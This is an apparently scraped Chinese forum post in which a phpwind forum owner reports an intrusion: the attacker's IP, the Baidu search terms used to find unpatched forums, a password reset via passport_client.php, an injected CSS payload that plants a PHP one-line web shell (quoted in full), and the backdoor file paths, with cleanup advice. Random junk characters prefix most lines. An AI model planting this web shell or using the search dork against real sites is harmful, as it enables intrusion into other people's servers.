
今天人比较累,不想多写了,也没多研究
i<l_z& 刚刚上论坛发现密码被改,就来看了一下,发现是出大BUG了
+hI:5(_ 打了补丁,慢慢分析了一下
YD_hg#=n 大概情况如下:
Z1
%"w*U U}<5%"!; 攻击者IP如下:219.147.205.124 所在的地理位置为: 黑龙江省牡丹江市 电信
(`\ DDJ[ #$
2{l,> 攻击者(以下简称JR)首先通过BAIDU查找肉鸡
z{Z4{&M 该JR使用的关键字是 魔兽 公会 powered by phpwind
n@xC?D:t* (估计是想*****。。)
Cp4 U`] D])&> 然后向passport_client.php页面POST了异常数据,测试过我的论坛没有打补丁后
Cw6\'p%l-\ 浏览论坛找到我的管理员帐号
P/i{_r N~H!6N W 再次向passport_client.php页面POST了攻击代码
>NLG"[\ OlRtVp1 成功修改了我的管理员密码,进入后台
)oqNQ'yZ 在论坛默认风格的CSS代码最后加入攻击代码
6Qtyv (具体代码不公布了,就是生成一个data/bbscache/admin_recors.php文件,
;] v{3m 里面的内容是:
复制代码- <?php eval($_POST[a])?>\r\n
|
)
U{1%ldOJ% an q1zH 后面他还访问了如下地址:
wrP3:!= /data/bbscache/admin_recors.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
,9,cN-/a /data/bbscache/admin_recors.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
8'WoG]E_ /1@py~ZX 最后通过
Fs$mLa data/bbscache/require.php?action=editfile&dir=.&editfile=admin_record.php
,#Pp_f< 撰改了后台管理记录
8I8{xt4 JU Xo3D~ Cl6P,C 简单的说,大家首先要查的,是论坛风格的CSS代码,清除掉,然后再删除上面提到的几个后门文件
vRkVPkZ6| "]T1DG" 累了,还是先休息了,明天有空再仔细研究下。。
]FNe&o1zX @Os0A 最后,还是要欢迎下大家来我的
www.yybug.com坐坐,研究些技术,扯扯蛋啥的,呵呵